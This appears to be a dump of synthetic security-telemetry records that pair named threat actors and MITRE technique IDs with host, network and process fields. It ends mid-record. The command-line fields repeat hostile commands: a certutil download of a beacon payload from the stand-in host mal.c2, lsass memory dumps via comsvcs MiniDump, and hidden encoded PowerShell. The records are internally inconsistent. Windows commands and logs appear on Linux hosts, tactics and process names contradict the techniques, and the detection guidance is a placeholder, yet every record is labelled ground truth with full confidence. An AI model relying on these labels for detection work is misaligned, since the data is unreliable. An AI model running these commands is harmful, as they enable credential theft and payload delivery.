text stringlengths 1.13k 1.33k |
|---|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Collection","Impact"],"technique_id":"T1570"},"event_id":"evt_apt29_20260127T071002000Z_0015601","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.4.212.71","name":"AZURE-VM-9HCVK3VO12","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15601APT29T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.77.81.119","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-16T09:27:48.000Z","user":{"name":"i-n5gqlixgs1uq","sid":"S-1-5-21-176087747-816906753-3995"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260226T210902000Z_0015603","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.247.78.225","name":"IAM-ROLE-IFUCIVLPCN","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15603Volt TyphoonT1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.192.166.181","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3512 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-19T08:12:07.000Z","user":{"name":"svc_cykugtugldzb","sid":"S-1-5-21-941121238-753108329-2440"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250529T175352000Z_0015605","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.129.214.217","name":"WIN-FIN-SRV-UPMSZ2JXA8","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15605FIN7T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.2.158.102","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-12-19T23:55:12.000Z","user":{"name":"azuread\\8bmxbrhn3q6e","sid":"S-1-5-21-589248336-796881542-1136"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Reconnaissance","Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250624T232116000Z_0015607","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.221.120.149","name":"DB-ORACLE-M6VJ0P6XDV","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15607Scattered SpiderT1566.001"},"network":{"domain":"github.com","dst_ip":"1.159.161.20","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-03-02T17:57:22.000Z","user":{"name":"azuread\\ymuv1km0o0zf","sid":"S-1-5-21-920251539-838447259-3731"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260625T080344000Z_0015609","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.163.99.54","name":"APP-WEB-7S8T9FTIYF","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15609APT29T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.51.65.9","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-16T23:15:12.000Z","user":{"name":"azuread\\gopjnbk4tcxi","sid":"S-1-5-21-534052491-478692617-7948"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20260101T210425000Z_0015611","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.169.170.32","name":"EC2-INST-R2G2IZT6M2","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15611APT29T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.179.166.183","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2529 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-06-03T06:01:18.000Z","user":{"name":"svc_xj6smb5vi8nl","sid":"S-1-5-21-688567051-153622667-1789"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Defense Evasion","Impact"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20250225T072506000Z_0015613","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.223.201.99","name":"EC2-INST-30JR3XHPVT","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15613Volt TyphoonT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.174.105.193","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-08-15T23:01:38.000Z","user":{"name":"azuread\\r5hi5zi2a9zl","sid":"S-1-5-21-221855023-853554597-8051"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Initial Access","Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250412T133316000Z_0015615","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.34.198.3","name":"IAM-ROLE-073QTTXKEH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15615UNC4841T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.140.46.5","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-09-26T20:26:36.000Z","user":{"name":"CORP\\by89avy0nfn0","sid":"S-1-5-21-953327105-767476115-6272"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20261218T135621000Z_0015617","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.39.18.137","name":"EC2-INST-B569056DAK","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15617Mustang PandaT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.107.113.101","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3067 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-05-04T01:53:46.000Z","user":{"name":"arn:aws:iam::f0s2cz3a0nov","sid":"S-1-5-21-838666538-692347619-3971"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery","Defense Evasion","Persistence"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20261101T184919000Z_0015619","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.227.88.63","name":"WIN-FIN-SRV-KVLEEGVB6Z","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15619Lapsus$T1546.003"},"network":{"domain":"github.com","dst_ip":"1.82.210.183","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3795 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-03-25T18:14:55.000Z","user":{"name":"svc_72mgah4ty5uc","sid":"S-1-5-21-314852929-489617536-7151"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Lateral Movement","Initial Access","Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20250922T195826000Z_0015621","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.97.39.74","name":"WIN-FIN-SRV-YOPK5W8RB4","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15621Lapsus$T1003.001"},"network":{"domain":"github.com","dst_ip":"1.24.79.32","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-01-25T03:32:28.000Z","user":{"name":"arn:aws:iam::at7cekmrae9r","sid":"S-1-5-21-701250581-138486346-7706"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Persistence"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20260329T122646000Z_0015623","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.252.129.137","name":"APP-WEB-B8HLWBJ7VY","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15623Volt TyphoonT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.190.195.75","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-31T02:09:23.000Z","user":{"name":"i-sxxp3tqv0r75","sid":"S-1-5-21-780096525-613275764-4903"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Exfiltration","Initial Access"],"technique_id":"T1570"},"event_id":"evt_lapsus_20261220T102909000Z_0015625","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.94.103.177","name":"EC2-INST-K5JN2YVU0D","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15625Lapsus$T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.151.252.16","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-07-22T20:01:06.000Z","user":{"name":"i-sn7ixr3vo4n2","sid":"S-1-5-21-394793545-518775063-8511"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20260530T064913000Z_0015627","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.95.236.152","name":"AZURE-VM-715BIN5BYZ","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15627Mustang PandaT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.48.147.50","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-05-30T07:55:18.000Z","user":{"name":"CORP\\kr1glhulqtsw","sid":"S-1-5-21-978416757-983891312-7676"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Persistence"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250505T235954000Z_0015629","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.254.159.104","name":"AZURE-VM-2358PSBK02","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15629UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.19.147.191","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2467 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-19T06:14:17.000Z","user":{"name":"azuread\\o99lj7liiohj","sid":"S-1-5-21-993242935-151319418-7048"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20251115T212435000Z_0015631","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.20.188.244","name":"WIN-FIN-SRV-1R3THUHZU4","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15631Mustang PandaT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.168.234.240","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-10-04T06:54:57.000Z","user":{"name":"svc_vmi7wot21kw4","sid":"S-1-5-21-499779235-977706121-9985"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control"],"technique_id":"T1531"},"event_id":"evt_fin7_20260521T222028000Z_0015633","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.230.160.30","name":"WIN-FIN-SRV-PKL9YXSSOS","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15633FIN7T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.192.142.200","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-13T15:47:40.000Z","user":{"name":"azuread\\j5f457i52pgl","sid":"S-1-5-21-784369304-834789014-1596"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20251105T054435000Z_0015635","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.108.113.115","name":"DB-ORACLE-E08GRABMH4","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15635APT29T1003.001"},"network":{"domain":"github.com","dst_ip":"1.15.12.56","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-06-14T04:24:37.000Z","user":{"name":"svc_apaqbgzcm2xs","sid":"S-1-5-21-432614990-752812137-7865"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance","Discovery"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20250820T120649000Z_0015637","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.145.53.90","name":"DB-ORACLE-H57HO4H3QL","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15637Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.112.33.202","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-30T09:26:49.000Z","user":{"name":"azuread\\cui9wbn5xbhx","sid":"S-1-5-21-460348395-584898851-3666"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Discovery"],"technique_id":"T1570"},"event_id":"evt_fin7_20250605T114412000Z_0015639","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.201.135.137","name":"DB-ORACLE-I582GMWZDY","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15639FIN7T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.54.88.70","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-08-27T16:37:05.000Z","user":{"name":"CORP\\zlfbomfzsii4","sid":"S-1-5-21-769664393-702225672-7111"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20260113T154445000Z_0015641","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.68.134.228","name":"WIN-FIN-SRV-14ZHZNT7QF","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15641UNC4841T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.27.245.129","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-03-04T02:37:42.000Z","user":{"name":"azuread\\cy0gn9pdmfih","sid":"S-1-5-21-880652948-622244445-5818"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Persistence"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20261203T061825000Z_0015643","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.255.49.104","name":"DB-ORACLE-K0A3XOFUDP","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15643Scattered SpiderT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.137.147.221","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-01T09:08:37.000Z","user":{"name":"arn:aws:iam::z5rsfy5mifk7","sid":"S-1-5-21-497770173-744849071-3327"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Initial Access","Credential Access","Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_lapsus_20260816T184402000Z_0015645","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.74.221.166","name":"EC2-INST-ZY9FNA4SML","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15645Lapsus$T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.46.89.138","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1115 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-09-24T07:16:43.000Z","user":{"name":"arn:aws:iam::k3ijofh9l9nh","sid":"S-1-5-21-552912426-361975106-1322"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20260825T002003000Z_0015647","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.96.109.209","name":"DB-ORACLE-IFT1N663AO","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"15647UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.98.46.221","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1046 C:\\temp\\lsass.dmp 